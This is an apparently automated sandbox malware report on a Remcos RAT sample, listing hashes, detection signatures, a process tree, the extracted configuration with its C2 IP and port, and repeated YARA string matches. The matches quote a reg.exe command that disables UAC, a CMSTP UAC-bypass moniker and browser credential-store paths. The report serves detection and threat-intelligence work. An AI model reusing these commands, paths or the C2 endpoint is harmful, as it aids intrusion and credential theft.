Edit tour

Windows Analysis Report
ltlbVjClX9.exe

Overview

General Information

Sample name:	ltlbVjClX9.exe renamed because original name is a hash value
Original sample name:	9e91474ce4c72005469f0884b6942940e1cecee9bf425fd2739a359ca3299c5f.exe
Analysis ID:	1486709
MD5:	41edad3ddf08bdf37cb05f98d91ea355
SHA1:	c4a6ef7263026d74c7ab54637cd4b336028143b3
SHA256:	9e91474ce4c72005469f0884b6942940e1cecee9bf425fd2739a359ca3299c5f
Tags:	exeRemcosRAT
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Creates autostart registry keys with suspicious names

Delayed program exit found

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

ltlbVjClX9.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\ltlbVjClX9.exe" MD5: 41EDAD3DDF08BDF37CB05F98D91EA355)

WerFault.exe (PID: 2520 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 964 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5036 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1120 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1136 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1164 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 2892 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1080 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 2616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1212 MD5: C31336C1EFC2CCB44B4326EA793040F2)

yavascript.exe (PID: 2604 cmdline: "C:\Users\user\AppData\Roaming\yavascript.exe" MD5: 41EDAD3DDF08BDF37CB05F98D91EA355)

WerFault.exe (PID: 3808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 880 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 2892 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 424 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1772 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 900 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3688 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 916 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5328 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 876 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 2260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 948 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 2292 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 904 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 2716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 976 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1816 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 988 MD5: C31336C1EFC2CCB44B4326EA793040F2)

yavascript.exe (PID: 5020 cmdline: "C:\Users\user\AppData\Roaming\yavascript.exe" MD5: 41EDAD3DDF08BDF37CB05F98D91EA355)

yavascript.exe (PID: 6772 cmdline: "C:\Users\user\AppData\Roaming\yavascript.exe" MD5: 41EDAD3DDF08BDF37CB05F98D91EA355)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "198.23.227.212:32583:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "yavascript.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0ZPVF8", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000001A.00000002.2513171339.000000000086C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000002.2513143474.0000000000828000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1140:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000014.00000002.2463964388.000000000061C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.2409581166.0000000000654000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xdc0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000014.00000002.2463923706.00000000005D8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1140:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2409616641.0000000000698000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.4474590588.0000000000553000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1768:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b90f:$a1: Remcos restarted by watchdog! 0x6be87:$a3: %02i:%02i:%02i:%03i
0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
0000000F.00000002.4474688472.0000000000598000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b90f:$a1: Remcos restarted by watchdog! 0x6be87:$a3: %02i:%02i:%02i:%03i
0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
